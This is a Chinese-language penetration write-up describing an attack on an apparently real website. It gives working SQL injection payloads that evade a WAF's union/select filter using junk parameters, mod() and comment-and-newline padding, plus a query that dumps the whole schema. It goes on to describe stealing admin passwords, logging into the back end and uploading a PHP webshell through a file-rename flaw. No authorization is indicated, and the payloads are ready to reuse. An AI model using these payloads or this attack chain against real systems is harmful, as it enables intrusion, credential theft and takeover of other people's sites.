实战绕过某WAF+拿shell组合拳

0x01 注入环节 目标加单引号报错，然后加闭合-- -返回正常，确认存在注入 OK，第一步判断注入完成，然后我们order by 查看有多少个字段 发现链接被重置某不知名WAF，我们这里第一手先尝试一手内联注入看是否能绕过order by检测 测试发现内联确实能绕过order by 的检测，payload /!order/ /!by/ 10-- - /!order/ /!by/ 18，18报错，17正常回显，这里确定有17个字段，然后我们进行union select 经测试发现内联无法绕过union select，这个站强制拦截 union 和 select关键字 这里发现就算把union注释了也会被拦截 这个确实是比较麻烦，他强制拦截这两个关键字，给我们注入带来了非常多的麻烦，然后这里经过我的测试构造出了一种办法来绕过他这个WAF的限制 第一种办法利用 and mod(35,12) 取基数和偶数的办法来让WAF的拦截变弱，然后再加上脏数据绕过现在我们来复现第一种办法绕过此WAF 这里发现构造 and mod 还是会被拦截，然后我们这里继续构造一波垃圾参数加 and mod 来绕过他对union的拦截强度 什么是垃圾参数呢？这里给大家讲一下当我们在url中输入：http://www.0day.team//index.php?s=a select，那么页面会显示危险请求，但是当我们输入http://www.0day.team//index.php?aaa=a select页面则不作任何响应。 因为服务器端的脚本并没有接收aaa参数他认为我们的语句已经被注释掉了，所以会给我们放行，而实际上a、aaa都是垃圾参数并没有被我们的动态脚本所处理，所以也不会影响程序功能 现在我们来实际操作一波这个拦截力度比较强的WAF 这样去构造垃圾参数可以看到页面是正常访问的，然后我们在 id=10 哪里正常输入我们的sql语句就行了 payload： detail.php?asdasdasdasd/*&id=10' and mod (35,12) union &asdasdas=1*/ 这里可以发现已经不拦截union了，可是这里比较鸡肋，你把union和select连起来他会进行拦截，这时候我们用构造脏数据的方法来进行绕过他的连接限制。 利用%23注释在里面添加脏数据，然后利用%0a进行换行操作，这样就可以成功绕过他这个WAF了 payload： detail.php?asdasdasdasd/*&id=10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect &asdasdas=1*/ 可以发现现在已经成功的绕过了union select，OK，现在我们来继续操作 成功的到回显位6 payload： detail.php?asdasdasdasd/*&id=.10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -&asdasdas=1*/ OK，然后我们继续来操作 database() 获取当前数据库 可以发现数据库已经出来，然后我们现在在来获取表 现在可以发现表名已经出来了，还发现一个事情就是这个WAF好像只拦截union和select关键字，这两个关键字有点难绕，其他的都不拦截。 可惜可惜，不然还可以在操作一波，然后回到正题，我们可以发现这个表实在是太多了，我懒的一个一个找，我这里直接构造一个爆表爆列的dios进行注入就行了 payload： detail.php?asdasdasdasd/*&id=.10' and mod (35,12) union%23aasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdasaasadasdassdasdasdasdasdasdasdasdasdasdasdas%0aselect 1,2,3,4,5,concat((select @rui from(select (@rui:=0x00),(select @rui from information_schema.columns where table_schema=database() and @rui in(@rui:=concat(@rui,table_name,0x2d2d3e,column_name,0x3c62723e))))rui)),7,8,9,10,11,12,13,14,15,16,17-- -&asdasdas=1*/ 这个是dios的效果，然后我们这里直接搜索password关键字，拿到后台账号密码就行了 已经找到了目标后台的账号密码表和列接下来直接注数据就行了 可以看到所有的管理员用户密码我们已经拿到了，接下来就进入找后台和拿shell环节 谷歌语法搜索发现目标管理后台，接下来我们进行登录尝试 利用刚才注入出来的数据成功登录到了目标后台 0x02 拿shell环节 接下来我们寻找上传点拿下目标shell 这一处发现利用burp抓包修改jpg后辍能导致任意上传，下面我们来实战进行测试 上传成功后发现php里面的内容被强制转换成图片了，这里发现比较鸡肋就没有跟深一步研究，然后开始重新找其他上传点 然后发现档案管理这里可以任意改文件名，我在这里上传了一个图片格式的一句话，然后改后缀为php，成功拿下目标shell 蚁剑链接图 文章来源：奇安信攻防社区（ruirui）原文地址：https://forum.butian.net/share/994 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！ 如侵权请私聊我们删文 END